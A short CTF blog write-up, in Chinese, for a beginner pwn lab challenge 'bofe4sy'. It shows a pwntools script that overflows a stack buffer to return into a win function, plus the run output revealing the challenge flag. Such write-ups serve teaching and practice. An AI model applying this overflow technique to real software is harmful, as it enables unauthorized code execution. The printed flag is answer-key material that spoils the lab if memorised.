kazma's blog

Pwnctf bofe4sy Writeup

kazma 成大資安社創辦人/社長

2023-12-20 22:05:14 2023-12-20 22:05:14 Created 2023-12-20 22:10:07 2023-12-20 22:10:07 Updated

writeup
| pwn
| lab
| pwnctf

bofe4sy

直接 bof return 到 win 就行：

exploit.py：

└─$ cat exploit.py
from pwn import *

r = process('./bofe4sy')

win = 0x400646
ret = 0x4004c1
p = b'a'*0x28 + p64(ret) + p64(win)

r.sendlineafter(b':', p)
r.interactive()

result：

└─$ python exploit.py
[+] Starting local process './bofe4sy': pid 301327
[*] Switching to interactive mode
Congrat !
$ cat flag
AngelboyCTF{YodbgBUFJp6ypXRqkKjI}

Pwned !!!

Title: Pwnctf bofe4sy Writeup
Author: kazma
Created at : 2023-12-20 22:05:14
Updated at : 2023-12-20 22:10:07
Link: https://kazma.tw/2023/12/20/Pwnctf-bofe4sy-Writeup/
License: This work is licensed under CC BY-NC-SA 4.0.

#writeup
#pwn
#lab
#pwnctf

Comments

On this page

Pwnctf bofe4sy Writeup

bofe4sy